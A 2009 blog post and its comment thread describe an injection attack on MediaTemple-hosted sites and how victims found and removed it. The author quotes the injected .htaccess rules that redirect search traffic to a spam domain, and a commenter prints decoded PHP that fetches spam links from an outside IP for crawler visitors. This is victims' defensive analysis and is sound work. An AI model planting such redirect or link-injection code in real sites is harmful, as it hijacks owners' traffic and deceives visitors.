MediaTemple/Wordpress Hack
I spent last night trying to figure out how my websites got hacked. Luckily no permanent damage was done, but it did take some time to figure out what was going on. I wanted to post my experience in case someone else comes across this same problem. Here is what happened…
By pure coincidence I happened to be looking at my robots.txt file last night. Actually, I didn’t even have a robots.txt file on my site. I was playing with Google’s Webmaster Tools and noticed that Google was giving errors when it read my robots.txt (which didn’t exist). I went to the address where there shouldn’t have been a file at all (http://fontburner.com/robots.txt) and saw a page of text filled with links to porn/spam sites. This sent me off on a wild goose chase to figure out how my site had been exploited.
The first place I looked was at my .htaccess file. My guess was that they were using the .htaccess file to redirect robots.txt to some other file. In my .htaccess file I noticed this code which I was pretty sure wan’t put there by me:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4¶meter=sf [R,L]
The thing that threw me off was that this looks like legitimate code because the first line looks like it might be telling Google not to index the images of your site. Is this the work of a clever hacker adding decoy code before the really nasty stuff?
Deleting this code from my .htaccess file didn’t seem to affect my robots.txt file so I kept looking for a solution.
At this point I opened a ticket with MediaTemple, my web host to see if they had any advice. They responded quickly with a link to a knowledge base article called “Working with a php injected website.” This article confirmed my .htaccess suspicions and also pointed me to a line of code found in php files. Removing the .htaccess code was easy, but how do you find a line of code in the thousands of php files on a Wordpress powered site?
MediaTemple also hinted at the possibility of needing to reinstall all Wordpress files, something that I really didn’t want to do. I did some searching and came accross a good writeup of the situation on kyle-brady.com called “Wordpress, MediaTemple, and an Injection Attack.” If you are a victim of this attack, I encourage you to read this post because it gives instructions about how to fix and identify the problem as well as many comments from other victims.
It turned out that in addition to removing the malicious code from the .htaccess file I also had to remove code from the index.php files in the root of my site. Once that was all cleared out, my robots.txt file issue was corrected. It looks like other people encountered deeper problems that affected the links in blog posts. Those people had to recreate their recent blog posts manually. Yuck.
This whole ordeal has left me feeling violated and unconfident about both Wordpress and MediaTemple. If someone can add code to your .htaccess and your index.php files, that is a major hack. I feel lucky that they didn’t do more harm than they did because it seems like if you can hack those files you could easily take a site down or worse.
I am unsure who is actually to blame for this exploit, if anyone is. I heave read that MediaTemple blames Wordpress and Wordpress blames MediaTemple. There are reports that Drupal sites have also been exploited, so the problem isn’t limited to Wordpress only. Wordpress has released an update in the last week, but I don’t see any evidence that this issue was addressed in the latest security fix.
MediaTemple has told me that they changed all affected sites passwords for FTP. They also said that they scanned their servers and removed the malicious code. This is a confusing statement because neither of these things appears to have been done in my case. My FTP password still worked, and unless I removed the code before they did, they didn’t remove it from my site.
The good news is that the issue is (hopefully) behind me. If you are hosted on MediaTemple, I would advise you to take a look at your robots.txt (even if you don’t have one) because if I hadn’t noticed it I never would have known my site was infected. You may be a victim of the hack and not even know it.
November 14th, 2009 at 11:59 pm
Thanks for this!
I ended up posting something as well. (Shameless plug: http://blog.theoriginalmrbob.com/index.php/2009/11/15/phphtaccess-hacks/ )
Thanks for your help! I thought it was just me!
November 15th, 2009 at 4:39 am
Wow, this is a pretty recent blogpost. My sites at Mediatemple have been hacked in the same way at Nov 14th. On which cluster are you?
November 15th, 2009 at 11:31 am
At least one of my Media Temple sites was hacked as well (gs), though none of the sites on my (dv) appear to have been affected. Are you (gs) or (dv)?
Thanks,
Jeffrey
November 15th, 2009 at 11:41 am
Bart, I am on Cluster 1 (I think).
Jeffrey, I am on the gridserver.
November 15th, 2009 at 12:19 pm
Boy am I glad to have found this info on here! Thanks for posting it.
I have had the same exact problem with my one of gridserver web accounts. They injected this same code on all three web sites (hosted under the same directory) even though only one of them was running WordPress. This account is on Grid Cluster:02 – Storage Segment:05 (you can check this in the SERVER GUIDE section of your Media Temple account).
On a different Media Temple account where I have my personal web site I have not had any problems, although I don’t run WordPress on that site.
Did you guys use the 1-Click Applications option from MediaTemple to install WordPress? It seems that version (v2.5) is outdated and might be the culprit. If not, what version of WordPress are you guys using?
November 15th, 2009 at 1:26 pm
Laz, I did not use the 1-Click applications options. I installed it manually. I was on version 2.85 when my site was exploited.
November 16th, 2009 at 1:28 am
My Joomla sites were all hacked in the same way.
Considering that I have now heard that Drupal and Wordpress sites were also hacked, the vulnerability must have been with Media Temple.
The support at Media Temple told me it must have been a security vulnerability with Joomla (even tho I’m running the latest version 1.5.14). After reading that they told you the same about Wordpress, I’m kind of pissed off that they are not being up front about this.
November 16th, 2009 at 6:19 am
I’ve had this exact problem. Looks like the hack occurred on November 5, 2009. All of my sites hosted with Media Temple GS (grid cluster 2, storage segment 6) were hacked at the same time in the way you describe – .htaccess, index.php and even (for a hand-coded, static site) index.html were hacked to include code to siphon search traffic away to someone else’s site.
All my sites were hit, whether they were running a CMS or not (WP 2.8.5 and one older version), Dokuwiki and hardcoded HTML all got the same treatment.
I initially assumed this was a Wordpress problem. Then that my FTP account had been hacked. Now I see others getting hit by exactly the same thing I’m suspicious that this may actually be a Media Temple problem.
November 16th, 2009 at 10:12 am
I had the exact same injection attack happen to me at Media Temple. MT tech support said they had scanned all my files and removed the malicious code, but nothing of the sort was done – spot checks on several domains and subdomains revealed that nothing had been repaired.
Kyle Brady’s post is definitely required reading for anyone who has been a victim of this attack.
At this point, from what I can tell, the common thread through all this is Media Temple. The vast majority of affected domains and subdomains on my MT account were not WP installations, although it’s certainly possible that the attack is being made *through* WP. If this were purely a WP problem, one would expect other web hosts to be victimized as well; so far it’s only Media Temple that’s had the problem.
November 17th, 2009 at 6:54 pm
This same thing happened to me. In my case, however, there was a robots.txt file where there was no longer one, although it was empty. I checked my Urchin logs and noticed a new file in a new directory that had received quite a bit of traffic. According to my logs, the attack happened some time on Monday last week (Nov 9, 2009) Media Temple already removed that file but the directory remained.
November 17th, 2009 at 8:32 pm
Yeah, I was hacked as well. I was running the most up to date version of wordpress. I just sent in a support ticket because something seemed fishy. After searching for the link that got 10k hits in the few days it was up I found this site (google cache) http://74.125.95.132/search?q=cache:KSx1UVh52-kJ:www.dp-lab.org/movable/index.php%3Fitemid%3D892+uprzos&cd=44&hl=en&ct=clnk&gl=us&client=firefox-a that surprisingly is almost all media temple sites! There are easily a few hundred, if not thousands of sites there!
I somehow doubt almost a thousand people had their accounts compromised at once WITHOUT it being Media temple’s fault. I am much more tolerant to a hack than a coverup. I hope we learn more soon!
November 18th, 2009 at 11:16 am
Hi, my (gs) account got hacked as well, and I can confirm that the hack is not confined to wp sites. I had a couple of wp sites and hand-built sites without any kind of cms/blogging backend on my (gs) account, and both types have been hacked by manipulating .htaccess and index.php. MediaTemple says that the ftp accounts got compromised, which I find a threadbare argument, as at least my ftp pw was 16+ chars long and QUITE hard to being brute-forced open. I hope that whatever back door the crackers used is closed by now.
November 23rd, 2009 at 11:52 am
I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but NONE of them had wordpress installed.
The encoded PHP evaluates to this:
if(stripos($_SERVER['HTTP_USER_AGENT'], ‘google’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘yahoo’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘msn’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘live’))
{
$r = ”;
if($f=@fsockopen(‘91.207.4.18′,80,$e,$er,10) and @fputs($f, “GET /linkit/in.php?domain=” . urlencode($_SERVER["SERVER_NAME"]) . “&useragent=” . urlencode($_SERVER['HTTP_USER_AGENT']) . ” HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n”))
while( $l = fread($f, 1024)) $r .= $l;
@fclose($f);
$p=strpos($r,”\r\n\r\n”); echo substr($r,$p+4);
}
November 23rd, 2009 at 1:36 pm
Have a mediatempleaccount with several websites (several wordpress installations (not up to date) and a site hand coded) all were infected in the last week or so.
November 25th, 2009 at 12:22 pm
It’s definitely not limited to Wordpress or other CMS sites. One of my clients’ Media Temple sites was attacked. It’s a hand-built site, and the only PHP included are includes and some PHP to parse a static XML file. There aren’t even any forms. If MT is trying to blame Wordpress for this, they’re really off base.
November 26th, 2009 at 10:22 am
This was not the fault of any software running on someone’s account. From what I understand, mt stored everyones passwords in plain text (ie. human readable) in their database, and it was this database itself that got hacked. This allowed hackers direct access via ftp and ssh to all of their clients accounts.
http://michaeltorbert.com/blog/media-temple-hacked/
If you do a search on Twitter right now for mediatemple you can see all the people affected. As of right now, as far as I know, they have not issued any official statement on this, let alone an apology.
November 26th, 2009 at 3:13 pm
Hey folks, if you didn’t notice any changes to your sites, that means none of your files were affected. FTP passes were changed as a precautionary measure.
Lots of info can be found here:
http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/
…with updates on the way.
Matt (mt)
December 1st, 2009 at 2:01 am
One of my clients’ MT account got hacked as well. I hope they fixed their holes because I have a bunch of clients hosted with them.
December 9th, 2009 at 10:50 am
Hi. My Media Temple Wordpress site hacked as well.
Here is what I want to know, as this has never happened to me before and I am semi-computer illiterate:
Is my site dead and gone? If not, how do I regain access to it.
I am also locked out of my FTP account. I assume this is related.
Any help would be greatly appreciated.